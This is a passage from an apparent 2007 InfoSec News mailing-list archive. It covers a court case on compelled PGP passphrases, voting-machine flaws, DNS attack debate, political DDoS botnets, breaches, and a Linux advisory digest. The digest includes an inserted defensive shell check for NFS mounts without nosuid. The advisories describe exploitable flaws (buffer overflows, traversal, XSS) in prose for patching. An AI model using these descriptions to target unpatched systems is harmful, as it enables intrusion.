He said that encryption keys can be "testimonial," and even the prosecution's alternative of asking the defendant to type in the passphrase when nobody was looking would be insufficient. Laptop files: Unencrypted, then encrypted A second reason this case is unusual is that Boucher was initially arrested when customs agents stopped him and searched his laptop when he and his father crossed the border from Canada on December 17, 2006. An officer opened the laptop, accessed the files without a password or passphrase, and allegedly discovered "thousands of images of adult pornography and animation depicting adult and child pornography." Boucher was read his Miranda rights, waived them, and allegedly told the customs agents that he may have downloaded child pornography. But then--and this is key--the laptop was shut down after Boucher was arrested. It wasn't until December 26 that a Vermont Department of Corrections officer tried to access the laptop--prosecutors obtained a subpoena on December 19--and found that the Z: drive was encrypted with PGP, or Pretty Good Privacy. (PGP sells software, including whole disk encryption and drive-specific encryption. It's a little unclear what exactly happened, but one likely scenario is that Boucher configured PGP to forget his passphrase, effectively re-encrypting the Z: drive, after a few hours or days had elapsed.) According to Niedermeier's written opinion, prosecutors sent Boucher a grand jury subpoena asking for the passwords because: Secret Service Agent Matthew Fasvlo, who has experience and training in computer forensics, testified that it is nearly impossible to access these encrypted files without knowing the password. There are no "back doors" or secret entrances to access the files. The only way to get access without the password is to use an automated system which repeatedly guesses passwords. 
According to the government, the process to unlock drive Z could take years, based on efforts to unlock similarly encrypted files in another case. Despite its best efforts, to date the government has been unable to learn the password to access drive Z. The opinion added: If the subpoena is requesting production of the files in drive Z, the foregone conclusion doctrine does not apply. While the government has seen some of the files on drive Z, it has not viewed all or even most of them. While the government may know of the existence and location of the files it has previously viewed, it does not know of the existence of other files on drive Z that may contain incriminating material. By compelling entry of the password the government would be compelling production of all the files on drive Z, both known and unknown. Boucher is a Canadian citizen who is a lawful permanent resident in the United States and lives with his father in Derry, N.H. Two attorneys listed as representing him could not immediately be reached for comment on Friday. So what happens next? It's possible that prosecutors will be able to establish that Boucher's laptop has child pornography on it without being able to access it: after all, there were at least two federal agents who looked at the laptop when the Z: drive was still unencrypted. But if this ruling in the case is eventually appealed, it could have a far-reaching impact in a pro-privacy or pro-law-enforcement direction. Michael Froomkin, a law professor at the University of Miami, has written that the government "would have a very hard time" trying to obtain a memorized passphrase. A similar argument, published in the University of Chicago Legal Forum in 1996, says: The courts likely will find that compelling someone to reveal the steps necessary to decrypt a PGP-encrypted document violates the Fifth Amendment privilege against compulsory self-incrimination. 
Because most users protect their private keys by memorizing passwords to them and not writing them down, access to encrypted documents would almost definitely require an individual to disclose the contents of his mind. This bars the state from compelling its production. This would force law enforcement officials to grant some form of immunity to the owners of these documents to gain access to them. But prosecutors think they can split the idea of immunity into two halves: divulging the passphrase, and then using the passphrase to decrypt the files. A 1996 article by Philip Reitinger of the Department of Justice's computer crime section proposes a clever device for forcing a defendant to divulge a PGP passphrase and then convicting him anyway (remember, the passphrase lets the key be used to decrypt the document): Finally, even if the foregoing considerations require the government to grant act-of-production immunity to compel production of a key, the scope of the immunity should be quite narrow. The contents of the key are not privileged, and it is the contents that will be used to decrypt a document. Therefore, the government can use the contents of the decrypted document without impediment. Unless the government cannot authenticate the document to be decrypted without using the act of production of the key, granting act-of-production immunity should have little effect. Translation: Giving a defendant limited immunity in terms of forcing them to turn over the passphrase can lead to a conviction. That's because the fellow technically isn't being convicted based on his passphrase; he's being convicted for what it unlocks. Isn't the law grand? 
From alerts at infosecnews.org Mon Dec 17 00:14:34 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:50 2008
Subject: [ISN] Ohio Elections Official Calls Machines Flawed
Message-ID:

http://www.nytimes.com/2007/12/15/us/15ohio.html

By Bob Driehaus
The New York Times
December 15, 2007

CINCINNATI - All five voting systems used in Ohio, a state whose electoral votes narrowly swung two elections toward President Bush, have critical flaws that could undermine the integrity of the 2008 general election, a report commissioned by the state's top elections official has found.

"It was worse than I anticipated," the official, Secretary of State Jennifer Brunner, said of the report. "I had hoped that perhaps one system would test superior to the others."

At polling stations, teams working on the study were able to pick locks to access memory cards and use hand-held devices to plug false vote counts into machines. At boards of election, they were able to introduce malignant software into servers.

Ms. Brunner proposed replacing all of the state's voting machines, including the touch-screen ones used in more than 50 of Ohio's 88 counties. She wants all counties to use optical scan machines that read and electronically record paper ballots that are filled in manually by voters. She called for legislation and financing to be in place by April so the new machines can be used in the presidential election next November. She said she could not estimate the cost of the changes.

[...]
From alerts at infosecnews.org Mon Dec 17 00:14:49 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:50 2008
Subject: [ISN] RE: DNS attack could signal Phishing 2.0
Message-ID:

Forwarded from The Unknown Security Guy

On Dec 13, 2007 3:05 AM, InfoSec News wrote:
> Forwarded from: Crypto Admin
>
> On 12/11/07, InfoSec News wrote:
> > http://www.infoworld.com/article/07/12/11/DNS-attack-could-signal-Phishing-2.0_1.html
> >
> > By Robert McMillan
> > IDG News Service
> > December 11, 2007
> >
> > Researchers at Google and the Georgia Institute of Technology are
> > studying a virtually undetectable form of attack that quietly controls
> > where victims go on the Internet.
>
> Please read the comments on this article over at CircleID, where it is
> pointed out that the data does not support any difficulties with open
> recursive DNS servers, but rather with misconfigured DNS servers. Both
> David A. Ulevitch and Brett Watson make the points far better than I
> could.
>
> http://www.circleid.com/posts/malicious_open_recursive_dns_servers/
>
> The authors of this report would have done themselves a favor, had
> they listened to their reviewers

I agree that it would make sense to point out that while DNSSEC ( http://www.dnssec.net ) will help, upgrading from Bind 4 might also help out a bit..

While I do not know if Dagon and friends scanned for port 53 (possibly including DNS servers running on infected Comcast machines for example), or used NS and SOA records to locate servers, I think the method was most likely a mix of all methods: port 53 scans, mixed with watching traffic to gather name server addresses, as well as taking advantage of the hierarchical nature of DNS mixed with professional connections.

Still, it doesn't take many servers to create either DNS Poisoning or massive DDoS's via DNS amplification attacks, and tens of thousands of "rogue" DNS servers are easily still enough to bring any TLD to its knees without the need for a massive botnet to do so (see: the death of Blue Security here: http://blog.washingtonpost.com/securityfix/2006/05/blue_security_surrenders_but_s.html and DNS Amplification Attacks here: http://www.securiteam.com/securityreviews/5GP0L00I0W.html ).. Even if it's due to malicious installation, misconfiguration, out-of-date software, caching or recursive queries: these servers all pose a threat, and only contribute to the ability for one person to take out what seems to be the Internet's Achilles' heel: DNS. Combining these five types of "rogue" servers in an attack can lead to vectors that boggle the mind.

The only reason we haven't seen many of the massive DNS Amplification Attacks on major TLDs is that the InfoSec community is largely ineffectual when it comes to hurting spammers/botmasters and cleaning up the networks and thereby damaging the attackers' bottom line. (I.E.: Whack-A-Mole is better than all-out war for their portfolio (and ours), which relies on the Internet to function for either of us to make any money). If our success at taking down botnets grows, we will see more of these attacks happen in order to show that whack-a-mole appeases everyone, while all-out war hurts everyone (see Blue Security again :-).

In the meantime, while DNS Amplification Attacks are blasé and would lead to all-out war (bad for both sides), DNS Poisoning can further the game of whack-a-mole without really hurting either InfoSec or Phishers, only end users. Very likely to be a growing attack vector.

I guess I am agreeing with David's assessment of the situation.
From alerts at infosecnews.org Mon Dec 17 00:15:06 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:50 2008
Subject: [ISN] Botnets linked to political hacking in Russia
Message-ID:

http://www.theregister.co.uk/2007/12/14/botnet_hacktivism/

By John Leyden
The Register
14th December 2007

Security researcher Jose Nazario has uncovered circumstantial evidence of the use of botnets in politically-motivated denial of service attacks.

Political events in the wider world are sometimes accompanied by hacking incidents in cyberspace, such as defacements and the like. Nobody paid much attention to the issue until the Estonian DDoS events of earlier this year when government and commercial sites in the small Baltic country were taken offline for days in April amid a row with Russia about relocation of a Soviet-era memorial to fallen soldiers and war graves.

Botnets orchestrated by Russian hackers are reckoned to have been used to fire up the Estonian attacks. Involvement of elements from the Russian government is suspected by some, though there's nothing by way of evidence that the Kremlin had a hand in the assaults.

Nazario, a senior security researcher at Arbor Networks, has documented how botnets have featured in more recent politically motivated DDoS events. Attacks on the Ukrainian pro-Russian site of the Party of Regions, a party led by the Ukrainian Prime Minister Viktor Yanukovych, over the last three months were traced by Nazario back to networks of compromised machines. Earlier DDoS attacks against the site of Ukraine President Viktor Yushchenko, a moderate Ukrainian nationalist, were not traced back to botnet activity.

Last week, Nazario traced attacks on the site of Gary Kasparov, famed Russian chess grand master turned anti-establishment politician, and namarsh.ru, another dissident site, back to a botnet. Both targeted sites seem to have weathered the assault largely unscathed (though the graphics on Kasparov's site failed to load properly).

The motives, much less the perpetrators, of the attacks remain unclear. "I can dream up scenarios where Russian hackers attack Russian dissident websites and politicians' websites (and why, for example, a Ukrainian site that is pro-Russian is attacked), but I don't know who is at the keyboard," Nazario writes. "I'll keep watching these attacks and seeing what I can figure out, but so far it's just a matter of guessing at motivations."

From alerts at infosecnews.org Mon Dec 17 00:15:42 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:50 2008
Subject: [ISN] Computer hackers hit into UM-Flint system
Message-ID:

http://www.mlive.com/news/flintjournal/index.ssf?/base/news-47/119769647063950.xml&coll=5

By Bryn Mickle
The Flint Journal
First Edition
December 15, 2007

FLINT - Computer users on the campus of the University of Michigan-Flint have been told to consider changing their passwords after hackers broke into several servers recently.

University computer technicians from the Flint and Ann Arbor campuses are working with the Flint office of the FBI to determine who was responsible for the unauthorized access.

The hack was discovered Dec. 6 and university officials said it is still unknown what data might have been compromised. The breach was contained shortly after it was found, said university spokesperson Jen Hogan.

Staff, students and faculty were told about the situation via an e-mail from the university on Thursday. Hogan said periodic password changes had already been suggested before the hack was discovered. "It's always a good idea," said Hogan.

It was unknown how many computers had access to the servers and no further information has been released.
From alerts at infosecnews.org Mon Dec 17 00:16:06 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:50 2008
Subject: [ISN] Admin Faces Prison for Trying to Axe California Power Grid
Message-ID:

http://www.pcworld.com/article/id,140587-c,hackers/article.html

By Robert McMillan
IDG News Service
December 14, 2007

A California man pleaded guilty Friday to charges that he shut down the data center responsible for managing the state's electrical supply.

Lonnie Denison, 33, is now facing as much as five years in prison and a US$250,000 fine after admitting to breaking a glass cover and hitting the emergency "off" switch at the California Independent System Operator (Cal-ISO) data center in Folsom, California, on April 15. By doing so, he shut off the power in the data center. He was formerly a contract Unix system administrator at the center.

Cal-ISO is the nonprofit organization that manages California's power. By knocking these systems offline, Denison effectively cut the state off from the energy market, leaving California vulnerable to blackout conditions. No blackouts occurred, however, because the data center went down at 11:23 p.m. on a Sunday -- a time when electricity demand is typically at a lull.

"If this deliberate shut-off had occurred in the morning ... things would have been far more severe," wrote Matthew Amant, the California Highway Patrol officer assigned to investigate the incident, in an affidavit.

It's not clear why Denison would have wanted to flip the switch on California's power, but according to U.S. attorneys, he was in a dispute with co-workers and just minutes before the incident had discovered that his computer privileges had been revoked.

Prosecutors allege that he followed up the power outage by sending an e-mail bomb threat the next day to an unnamed Cal-ISO employee, saying, "Hey, at one point I respected you ... you have a new kid. So this is only because of him. Get out before the timer expires. Not long now. Take care."

Following this threat, Cal-ISO evacuated about 500 employees from all three of its Folsom campus buildings, transferring control of the grid to a second control center. That same day Denison spoke with a friend, admitting that he had tried to "shut off the power grid," according to a statement from the U.S. Department of Justice.

The Sunday night incident knocked the data center down for about two hours, but it took 20 computer technicians about seven hours to fully restore the system. The total cost of the outage is estimated at $14,000.

Denison, of Sacramento, California, is set to be sentenced on Feb. 29, 2008, in federal court.

From alerts at infosecnews.org Tue Dec 18 00:00:55 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:50 2008
Subject: [ISN] Researchers: Beware the IE Cache on a Public Terminal
Message-ID:

http://www.eweek.com/article2/0,1895,2236192,00.asp

By Ryan Naraine
eWEEK.com
December 17, 2007

If you use IE to access Gmail on public terminals, you may be leaving a lot of sensitive information exposed in the browser's cache.

If you use Internet Explorer to access Google's Gmail on public terminals, you may be leaving a lot of sensitive information exposed in the browser's cache, according to a warning from Web application security specialist Cenzic.

Cenzic issued an alert for what it argues are vulnerabilities in Gmail and IE that could "severely impact e-mail systems and user privacy." However, Microsoft has downplayed the risk, insisting this is "not a product vulnerability."

Cenzic spokesman Mandeep Khera said his company's researchers figured out a way to use CSRF (cross-site request forgery) in combination with the improper use of caching directives to hijack Gmail credentials from the IE cache.

The issue is specific to Gmail on IE and Cenzic believes both Microsoft and Google should apply fixes to secure customers, especially those using computer kiosks in a library or Internet café.
After a "thorough investigation," Microsoft has dismissed the threat as overblown.

"In the scenario in question an attacker would need authenticated access to the system in order to modify files located in the cache. With that level of access, an attacker could install malicious programs that would have more impact than the scenarios described," a Microsoft spokesman said in a statement sent to eWEEK.

Cenzic's Khera acknowledged that the hacker must have physical access to the system to launch an attack but insists it presents a real cross-site scripting risk to end users who use public terminals.

"I understand Microsoft's position but that doesn't mean it's not a vulnerability. It's still a serious issue that needs to be patched," Khera said in an interview.

In the absence of a patch, Khera recommends that users disable caching of pages at the browser level, which will prevent any page from being cached for later viewing. This workaround may adversely affect the browsing experience, he warned.

Technical details of the issue have been sent to the US-CERT (U.S. Computer Emergency Response Team).

From alerts at infosecnews.org Tue Dec 18 00:01:36 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:50 2008
Subject: [ISN] RE: DNS attack could signal Phishing 2.0
Message-ID:

Forwarded from: Paul Hoffman

At 12:14 AM -0600 12/17/07, InfoSec News wrote:
> > Please read the comments on this article over at CircleID, where it
> > is pointed out that the data does not support any difficulties with
> > open recursive DNS servers, but rather with misconfigured DNS
> > servers. Both David A. Ulevitch and Brett Watson make the points far
> > better than I could.
> >
> > http://www.circleid.com/posts/malicious_open_recursive_dns_servers/
> >
> > The authors of this report would have done themselves a favor, had
> > they listened to their reviewers
>
> I agree that it would make sense to point out that while DNSSEC (
> http://www.dnssec.net ) will help, upgrading from Bind 4 might also
> help out a bit..

DNSSEC will not help unless the users' systems are configured to reject unsigned responses and responses whose signature will not validate. It will take typical users about ten minutes to apply the "just click through the security warnings" lesson from SSL to these warnings, thereby making DNSSEC useless to everyone except the people who are already security conscious. No panacea here.

> Still, it doesn't take many servers to create either DNS Poisoning or
> massive DDoS's via DNS amplification attacks

You have conflated two completely different DNS problems into one, thereby falling for Mice and Men's scare tactics.

To fix DNS poisoning attacks, we need to get the resolvers running the broken code to update their code. *None* of the people running those resolvers want to be running bad code; it doesn't serve them at all. They can be identified and, with a bit of creativity, contacted by email and phone. A round of "shaming the lame" could probably reduce the number of such servers by 90%.

In order to reduce the possibility of DNS amplification attacks, you need to turn off nearly every open DNS resolver. This is essentially impossible because there are plenty of good reasons for DNS administrators to want their resolvers to be open. Closing open resolvers means that mobile users cannot use their home DNS servers and are at the whim of whatever local DNS server they are forced to attach to. This can and will change over time as PCs allow users to easily use passwords to get their DNS resolution services, but for now (and probably at least ten years), they're stuck.

As the original message said, read the comments on the original article from people who have actually researched this topic. Knee-jerk reactions are common (as we have seen in the debate on this topic in the IETF for the past few months) but not helpful in actually getting the DNS to be secure in the long run.

--Paul Hoffman, Director
--VPN Consortium

From alerts at infosecnews.org Tue Dec 18 00:02:02 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:50 2008
Subject: [ISN] Linux Advisory Watch: December 14th, 2007
Message-ID:

+------------------------------------------------------------------------+
|                  LinuxSecurity.com Weekly Newsletter                   |
|                  December 14th, 2007          Volume 8, Number 51      |
|                                                                        |
|  Editorial Team:  Dave Wreski                                          |
|                   Benjamin D. Thomas                                   |
+------------------------------------------------------------------------+

Thank you for reading the LinuxSecurity.com weekly security newsletter. The purpose of this document is to provide our readers with a quick summary of each week's most relevant Linux security headlines.

This week, advisories were released for ruby, libnss, htdig, samba, qt, firefox, wpa_supplicant, openssh-askpass, mysql, e2fsprogs, tomcat, java, autofs, python, and cairo. The distributors include Debian, Fedora, Mandriva, Red Hat, SuSE, and Ubuntu.

---

>> Linux+DVD Magazine <<

Our magazine is read by professional network and database administrators, system programmers, webmasters and all those who believe in the power of Open Source software. The majority of our readers are between 15 and 40 years old. They are interested in current news from the Linux world, upcoming projects etc. In each issue you can find information concerning typical use of Linux: safety, databases, multimedia, scientific tools, entertainment, programming, e-mail, news and desktop environments.
http://www.linuxsecurity.com/ads/adclick.php?bannerid=26

---

Knock, Knock, Knockin' on EnGarde's Door (with FWKNOP)
------------------------------------------------------

Secret knocks have been used for purposes as simple and childish as identifying friend or foe during a schoolyard fort war. Fraternities teach these knocks as a rite of passage into their society, and in our security world we can implement this layer of security to lock down an SSH server. With this guide on FWKNOP by Eckie S. (one of our own), you are taken on an easy-to-follow process of securing your platform with your own client and server port knocking set-up: installation, iptables rules setup, configuring access for the client and server, and everything in between. Check it out!

http://www.linuxsecurity.com/content/view/131846

---

Master's Student: Social Engineering is not just a definition!
--------------------------------------------------------------

We are happy to announce a new addition to the Linux Security Contributing Team: Gian G. Spicuzza. Currently a Graduate Student pursuing a Masters Degree in Computer Security (MSIA), Gian is a certified Linux/Unix administrator, the lead developer for the OSCAR-Backup System (at Sourceforge.com) and has experience in a variety of CSO, Management and consulting positions. His first topic is a quick foray into the world and psychology of Social Engineering: All the security in the world isn't going to stop one of your employees or coworkers from giving up information. Just how easy is it?

http://www.linuxsecurity.com/content/view/131036

--> Take advantage of the LinuxSecurity.com Quick Reference Card! <--
--> http://www.linuxsecurity.com/docs/QuickRefCard.pdf <--

--------------------------------------------------------------------------

* EnGarde Secure Community v3.0.18 Now Available! (Dec 4)
-------------------------------------------------------

Guardian Digital is happy to announce the release of EnGarde Secure Community 3.0.18 (Version 3.0, Release 18). This release includes the brand new Health Center, new packages for FWKNOP and PSAD, updated packages and bug fixes, some feature enhancements to Guardian Digital WebTool and the SELinux policy, as well as other new features. In distribution since 2001, EnGarde Secure Community was one of the very first security platforms developed entirely from open source, and has been engineered from the ground-up to provide users and organizations with complete, secure Web functionality, DNS, database and e-mail security, integrated intrusion detection and SELinux policies and more.

http://www.linuxsecurity.com/content/view/131851

--------------------------------------------------------------------------

* Debian: New Linux 2.6.18 packages fix several vulnerabilities (Dec 11)
----------------------------------------------------------------------

Eric Sandeen provided a backport of Tejun Heo's fix for a local denial of service vulnerability in sysfs. Under memory pressure, a dentry structure may be reclaimed, resulting in a bad pointer dereference causing an oops during a readdir.

http://www.linuxsecurity.com/content/view/132136

* Debian: New ruby-gnome2 packages fix execution of arbitrary code (Dec 11)
-------------------------------------------------------------------------

It was discovered that ruby-gnome2, GNOME-related bindings for the Ruby language, didn't properly sanitize input prior to constructing dialogs. This could allow for the execution of arbitrary code if untrusted input is displayed within a dialog.
http://www.linuxsecurity.com/content/view/132133 * Debian: New libnss-ldap packages fix denial of service (Dec 11) --------------------------------------------------------------- It was reported that a race condition exists in libnss-ldap, an NSS module for using LDAP as a naming service, which could cause denial of service attacks when applications use pthreads. http://www.linuxsecurity.com/content/view/132132 * Debian: New htdig packages fix cross site scripting (Dec 11) ------------------------------------------------------------ Michael Skibbe discovered that htdig, a WWW search system for an intranet or small internet, did not adequately quote values submitted to the search script, allowing remote attackers to inject arbitrary script or HTML into specially crafted links. http://www.linuxsecurity.com/content/view/132131 * Debian: New Linux 2.6.18 packages fix several vulnerabilities (Dec 11) ---------------------------------------------------------------------- and remote vulnerabilities have been discovered in the Linux kernel that may lead to a denial of service or the execution of arbitrary code. Eric Sandeen provided a backport of Tejun Heo's fix for a local denial of service vulnerability in sysfs. Under memory pressure, a dentry structure maybe reclaimed resulting in a bad pointer dereference causing an oops during a readdir. http://www.linuxsecurity.com/content/view/132128 * Debian: New samba packages fix arbitrary code execution (Dec 10) ---------------------------------------------------------------- Alin Rad Pop discovered that Samba, a LanManager-like file and printer server for Unix, is vulnerable to a buffer overflow in the nmbd code which handles GETDC mailslot requests, which might lead to the execution of arbitrary code. 
http://www.linuxsecurity.com/content/view/132047 -------------------------------------------------------------------------- * Fedora 7 Update: qt4-theme-quarticurve (Dec 13) ----------------------------------------------- This update fixes Quarticurve to use system icons (rather than builtin Qt ones) in Qt 4 dialogs (e.g. QPrintDialog) also in KDE 4 apps. http://www.linuxsecurity.com/content/view/132203 -------------------------------------------------------------------------- * Mandriva: Updated Firefox packages fix multiple (Dec 14) -------------------------------------------------------- A number of security vulnerabilities have been discovered and corrected in the latest Mozilla Firefox program, version 2.0.0.11. This update provides the latest Firefox to correct these issues. As well, it provides Firefox 2.0.0.11 for older products. http://www.linuxsecurity.com/content/view/132236 * Mandriva: Updated wpa_supplicant package fixes remote (Dec 13) -------------------------------------------------------------- Stack-based buffer overflow in driver_wext.c in wpa_supplicant 0.6.0 allows remote attackers to cause a denial of service (crash) via crafted TSF data. Updated package fixes this issue. http://www.linuxsecurity.com/content/view/132201 * Mandriva: Updated samba packages fix vulnerability (Dec 11) ----------------------------------------------------------- Alin Rad Pop of Secunia Research discovered a stack buffer overflow in how Samba authenticates remote users. A remote unauthenticated user could trigger this flaw to cause the Samba server to crash, or possibly execute arbitrary code with the permissions of the Samba server. The updated packages have been patched to correct these issues. 
http://www.linuxsecurity.com/content/view/132135

* Mandriva: Updated openssh-askpass-qt package fixes exit (Dec 11)
----------------------------------------------------------------
The QT openssh password asking dialog, provided by the openssh-askpass-qt package, would always exit with successful status (0), even when the user did not press the Ok button. This would, at least, make the openssh client always allow sharing a connection when the ControlMaster option was set to ask. This update fixes the issue.
http://www.linuxsecurity.com/content/view/132134

* Mandriva: Updated MySQL packages fix multiple (Dec 10)
------------------------------------------------------
A vulnerability in MySQL prior to 5.0.45 did not require privileges such as SELECT for the source table in a CREATE TABLE LIKE statement, allowing remote authenticated users to obtain sensitive information such as the table structure (CVE-2007-3781).
http://www.linuxsecurity.com/content/view/132127

* Mandriva: Updated e2fsprogs packages fix vulnerability (Dec 10)
---------------------------------------------------------------
Rafal Wojtczuk of McAfee AVERT Research found that e2fsprogs contained multiple integer overflows in memory allocations, based on sizes taken directly from filesystem information. These flaws could result in heap-based overflows potentially allowing for the execution of arbitrary code.
http://www.linuxsecurity.com/content/view/132126

* Mandriva: Updated tomcat5 packages fix multiple (Dec 10)
--------------------------------------------------------
A number of vulnerabilities were found in Tomcat: A directory traversal vulnerability, when using certain proxy modules, allows a remote attacker to read arbitrary files via a .. (dot dot) sequence with various slash, backslash, or url-encoded backslash characters (CVE-2007-0450; affects Mandriva Linux 2007.1 only).
Multiple cross-site scripting vulnerabilities in certain JSP files allow remote attackers to inject arbitrary web script or HTML (CVE-2007-2449).
http://www.linuxsecurity.com/content/view/132048
--------------------------------------------------------------------------
* RedHat: Moderate: java-1.4.2-bea security update (Dec 12)
---------------------------------------------------------
A buffer overflow in the Java Runtime Environment image handling code was found. If an attacker is able to cause a server application to process a specially crafted image file, it may be possible to execute arbitrary code as the user running the Java Virtual Machine.
http://www.linuxsecurity.com/content/view/132138

* RedHat: Important: autofs security update (Dec 12)
--------------------------------------------------
Updated autofs packages are now available to fix a security flaw for Red Hat Enterprise Linux 5. There was a security issue with the default installed configuration of autofs version 5 whereby the entry for the "hosts" map did not specify the "nosuid" mount option. A local user with control of a remote nfs server could create a setuid root executable within an exported filesystem on the remote nfs server that, if mounted using the default hosts map, would allow the user to gain root privileges.
http://www.linuxsecurity.com/content/view/132139

* RedHat: Important: autofs5 security update (Dec 12)
---------------------------------------------------
Updated Red Hat Enterprise Linux 4 Technology Preview autofs5 packages are now available to fix a security flaw. There was a security issue with the default installed configuration of autofs version 5 whereby the entry for the "hosts" map did not specify the "nosuid" mount option. A local user with control of a remote nfs server could create a setuid root executable within an exported filesystem on the remote nfs server that, if mounted using the default hosts map, would allow the user to gain root privileges.
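As an added illustration of the autofs issue in the two Red Hat entries above (example code written for this digest, not Red Hat's or the newsletter's), the following POSIX shell check reads /proc/mounts-style lines and reports NFS mounts whose option list lacks nosuid, the condition that lets a setuid root binary on a remote export be honoured locally. The sample mount table is constructed for the example; on a live host the function would be fed /proc/mounts.

```shell
#!/bin/sh
# Added example, not from the advisory: report NFS mounts that were mounted
# without the nosuid option. Input lines follow the /proc/mounts layout:
#   source mountpoint fstype options dump pass

# Constructed sample mount table. The /net/fileserver/export line models an
# autofs "hosts" map mount made without nosuid; /mnt/backup is the hardened form.
SAMPLE_MOUNTS='rootfs / rootfs rw 0 0
/dev/sda1 / ext3 rw,data=ordered 0 0
-hosts /net autofs rw,fd=7,pgrp=1234,timeout=60,minproto=5,maxproto=5,indirect 0 0
fileserver:/export /net/fileserver/export nfs rw,vers=3,addr=192.0.2.10 0 0
backup:/srv /mnt/backup nfs rw,nosuid,nodev,vers=3,addr=192.0.2.11 0 0'

# find_suid_capable_nfs: read mount-table lines on stdin and print
# "mountpoint source" for every nfs/nfs4 mount whose options contain no nosuid.
find_suid_capable_nfs() {
    while read -r src mnt fstype opts _rest; do
        case "$fstype" in
            nfs|nfs4) ;;
            *) continue ;;
        esac
        # Wrap the option list in commas so nosuid is matched as a whole option,
        # not as a substring of some other option.
        case ",$opts," in
            *,nosuid,*) ;;
            *) printf '%s %s\n' "$mnt" "$src" ;;
        esac
    done
}

# count_sample_findings: number of offending mounts in the constructed sample.
count_sample_findings() {
    printf '%s\n' "$SAMPLE_MOUNTS" | find_suid_capable_nfs | wc -l | tr -d ' '
}

# Stand-alone run over the constructed sample. On a live host use:
#   find_suid_capable_nfs < /proc/mounts
printf '%s\n' "$SAMPLE_MOUNTS" | find_suid_capable_nfs
```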
This update has been rated as having important security impact by the Red Hat Security Response Team.
http://www.linuxsecurity.com/content/view/132140

* RedHat: Critical: samba security update (Dec 10)
------------------------------------------------
Updated samba packages that fix a security issue are now available for Red Hat Enterprise Linux 4.5 Extended Update Support. A stack buffer overflow flaw was found in the way Samba authenticates remote users. A remote unauthenticated user could trigger this flaw to cause the Samba server to crash, or execute arbitrary code with the permissions of the Samba server. This update has been rated as having critical security impact by the Red Hat Security Response Team.
http://www.linuxsecurity.com/content/view/132043

* RedHat: Moderate: python security update (Dec 10)
-------------------------------------------------
Updated python packages that fix several security issues are now available for Red Hat Enterprise Linux 3 and 4. An integer overflow flaw was discovered in the way Python's pcre module handled certain regular expressions. If a Python application used the pcre module to compile and execute untrusted regular expressions, it may be possible to cause the application to crash, or allow arbitrary code execution with the privileges of the Python interpreter. This update has been rated as having moderate security impact by the Red Hat Security Response Team.
http://www.linuxsecurity.com/content/view/132044

* RedHat: Moderate: python security update (Dec 10)
-------------------------------------------------
Updated python packages that fix several security issues are now available for Red Hat Enterprise Linux 2.1. An integer overflow flaw was discovered in the way Python's pcre module handled certain regular expressions.
If a Python application used the pcre module to compile and execute untrusted regular expressions, it may be possible to cause the application to crash, or allow arbitrary code execution with the privileges of the Python interpreter. This update has been rated as having moderate security impact by the Red Hat Security Response Team.
http://www.linuxsecurity.com/content/view/132041

* RedHat: Critical: samba security and bug fix update (Dec 10)
------------------------------------------------------------
Updated samba packages that fix a security issue and a bug are now available for Red Hat Enterprise Linux. A stack buffer overflow flaw was found in the way Samba authenticates remote users. A remote unauthenticated user could trigger this flaw to cause the Samba server to crash, or execute arbitrary code with the permissions of the Samba server. This update has been rated as having critical security impact by the Red Hat Security Response Team.
http://www.linuxsecurity.com/content/view/132042
--------------------------------------------------------------------------
* SuSE: samba (SUSE-SA:2007:068) (Dec 12)
---------------------------------------
The Samba suite is an open-source implementation of the SMB protocol. This update of samba fixes a buffer overflow in function send_mailslot() that allows remote attackers to overwrite the stack with 0 (via memset(3)) by sending specially crafted SAMLOGON packets.
http://www.linuxsecurity.com/content/view/132137
--------------------------------------------------------------------------
* Ubuntu: Cairo regression (Dec 12)
----------------------------------
USN-550-1 fixed vulnerabilities in Cairo. A bug in font glyph rendering was uncovered as a result of the new memory allocation routines. In certain situations, fonts containing characters with no width or height would not render any more. This update fixes the problem. We apologize for the inconvenience.
http://www.linuxsecurity.com/content/view/132198

* Ubuntu: Cairo regression (Dec 10)
----------------------------------
Peter Valchev discovered that Cairo did not correctly decode PNG image data. By tricking a user or automated system into processing a specially crafted PNG with Cairo, a remote attacker could execute arbitrary code with user privileges.
http://www.linuxsecurity.com/content/view/132046
------------------------------------------------------------------------
Distributed by: Guardian Digital, Inc. LinuxSecurity.com
To unsubscribe email vuln-newsletter-request@linuxsecurity.com with "unsubscribe" in the subject of the message.
------------------------------------------------------------------------

From alerts at infosecnews.org Tue Dec 18 00:02:19 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] Business data exposed on Canada Post website Message-ID: http://www.theglobeandmail.com/servlet/story/RTGAM.20071217.wbreach17/BNStory/National/home By Kenyon Wallace The Globe and Mail December 17, 2007 Login records for scores of small businesses that use Canada Post's business shipping website are available online as a result of a Web server glitch, leaving sensitive information such as names, addresses and shipping details vulnerable. A Vancouver small business owner discovered the security breach last week while conducting a Yahoo search of his company name. The first link generated by Yahoo contained his username and password for Canada Post's Sell Online website. Only the letters "CPC" that are required to come before all usernames were missing. The man then discovered that by simply changing the date in his Web browser address bar, he could access dozens of websites with other login records that disclosed usernames and attempts to enter passwords on the Sell Online website. "I was absolutely shocked," said the man who spoke to the Globe and Mail on the condition of anonymity.
"This information simply should not be in the public domain. Anyone with my password could have accessed customer shipping details and my Visa card number, which is attached to the website." François Legault, a spokesman for Canada Post, could not specify the root cause of the security breach, but said the federal agency believes the available "out of date" usernames and passwords pose no threat to its customers. Mr. Legault said the federal agency - which farms out all of its IT services to third parties such as Innovapost and IBM - had addressed the problem. But a Yahoo search of cached websites Friday revealed more Sell Online usernames and login attempts. "Obviously, we unfortunately won't be able to find and eliminate all the cached daily files, but over time they will expire and we're confident there's no risk that someone can use this information to steal identities," Mr. Legault said. But an Internet law specialist said that even though the data made available by Canada Post show failed login attempts - incorrect combinations of usernames and passwords - this kind of information is a potential "gold mine" for those engaged in identity theft and Internet fraud. "People typically use the same username and the same password across multiple websites," said Michael Geist, a law professor at the University of Ottawa. "If you're a fraudster, you could use the information from the Canada Post records to 